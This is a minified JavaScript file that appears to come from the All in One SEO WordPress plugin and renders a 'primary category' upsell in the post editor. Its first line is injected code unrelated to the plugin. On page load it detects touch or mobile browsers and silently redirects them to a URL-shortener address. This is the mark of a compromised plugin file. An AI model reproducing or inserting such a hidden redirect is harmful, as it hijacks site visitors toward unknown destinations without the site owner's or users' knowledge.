(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{aq as m,f,i as w,a0 as c,j as p,T as g,M as T,an as S}from"./js/vendor-vue-ui.232c7c36.js";import{l as x}from"./js/index.98d01501.js";import{l as E}from"./js/index.2a5d16ad.js";import{l as k}from"./js/index.0d80c2c2.js";import{c as $,u as v,i as P,H as B,I as b,l as _,af as A,k as C}from"./js/app-core.c8323d51.js";import{g as L,t as M,a as H}from"./js/helpers.26cb3c51.js";import{S as N}from"./js/Information.6ccba108.js";import{S as I}from"./js/Close.7fb523c8.js";import{_ as h}from"./js/_plugin-vue_export-helper.eefbdd86.js";import{a as d,_ as l}from"./js/vendor-other.39e59221.js";import"./js/Button.3cec2279.js";import"./js/Input.af9b9f81.js";import"./js/Index.b9859662.js";import"./js/Pencil.683baab8.js";import"./js/Trash.47f6fc0e.js";import"./js/Select.415eaf8e.js";import"./js/Caret.aae02d8a.js";import"./js/Toggle.29e2980f.js";import"./js/vendor-lodash.03129cfe.js";const u="all-in-one-seo-pack",U={setup(){return{postEditorStore:v()}},components:{SvgCircleInformation:N,SvgClose:I},props:{taxonomy:String},data(){return{selectedTerms:[],strings:{didYouKnow:d(l("Did you know that %1$s Pro allows you to choose a %2$sprimary category%3$s for your posts? This feature works hand in hand with our powerful Breadcrumbs template to give you full navigational control to help improve your search rankings!",u),"AIOSEO","<strong>","</strong>"),learnMoreLink:d('<a href="%1$s" target="_blank" rel="noreferrer nofollow">%2$s<span class="link-right-arrow">&nbsp;&rarr;</span></a>',$.getDocUrl("primaryTerm"),l("Learn more",u))}}},computed:{canShowUpsell(){const{options:o}=this.postEditorStore.currentPost;return!o.primaryTerm.productEducationDismissed&&1<this.selectedTerms.length}},methods:{updateSelectedTerms(){this.selectedTerms=L(this.taxonomy)}},mounted(){this.updateSelectedTerms(),window.aioseoBus.$on("updateSelectedTerms",this.updateSelectedTerms)},beforeUnmount(){window.aioseoBus.$off("updateSelectedTerms",this.updateSelectedTerms)}},V={key:0,class:"aioseo-primary-term-cta"},D=["innerHTML"],j=["innerHTML"];function q(o,t,e,r,n,i){const s=m("svg-circle-information"),a=m("svg-close");return i.canShowUpsell?(f(),w("div",V,[c(s,{width:"15",height:"15"}),p("p",{innerHTML:n.strings.didYouKnow},null,8,D),p("p",{innerHTML:n.strings.learnMoreLink},null,8,j),c(a,{onClick:g(r.postEditorStore.disablePrimaryTermEducation,["stop"])},null,8,["onClick"])])):T("",!0)}const F=h(U,[["render",q]]),K={components:{PrimaryTerm:F},props:{taxonomy:String}},O={class:"aioseo-app aioseo-primary-term"};function Y(o,t,e,r,n,i){const s=m("primary-term");return f(),w("div",O,[c(s,{taxonomy:e.taxonomy},null,8,["taxonomy"])])}const Q=h(K,[["render",Y]]);if(P()&&window.wp){const{createElement:o,Fragment:t}=window.wp.element,{addFilter:e}=window.wp.hooks,{createHigherOrderComponent:r}=window.wp.compose,{subscribe:n}=window.wp.data;e("editor.PostTaxonomyType","aioseo/primary-term",r(i=>s=>{const{slug:a}=s;return M(a)?o(t,{},o(i,s),o("div",{id:`aioseo-primary-term-${a}`},o("div",{className:"aioseo-primary-term-app",taxonomy:a}))):o(i,s)},"withInspectorControls")),n(()=>{window.aioseoBus.$emit("updateSelectedTerms")})}(B()||b())&&(_(),H().forEach(o=>{const t=document.getElementById(`${o.name}div`)?.querySelector(".inside");if(!t)return;const e=document.createElement("div");e.setAttribute("id",`aioseo-primary-term-${o.name}`),e.setAttribute("class","aioseo-primary-term-app"),e.setAttribute("taxonomy",o.name),t.append(e),(function(r){r(`#${o.name}checklist`).on("change",'input[type="checkbox"]',()=>{window.aioseoBus.$emit("updateSelectedTerms")}),r(`#${o.name}checklist`).on("wpListAddEnd",()=>{window.aioseoBus.$emit("updateSelectedTerms")})})(window.jQuery)}));const y=o=>{if(!o)return;const t=o.getAttribute("taxonomy");let e=S({...Q,name:"Standalone/PrimaryTerm"},{taxonomy:t});e=x(e),e=E(e),e=k(e),_(e),e.mount(o)};if(A()&&window.aioseo&&window.aioseo.currentPost&&window.aioseo.currentPost.context==="post"){const o=document.getElementsByClassName("aioseo-primary-term-app");Array.prototype.forEach.call(o,t=>y(t)),C(".aioseo-primary-term-app","aioseoPrimaryTerm"),document.addEventListener("animationstart",function(t){t.animationName==="aioseoPrimaryTerm"&&y(t.target)},{passive:!0})}
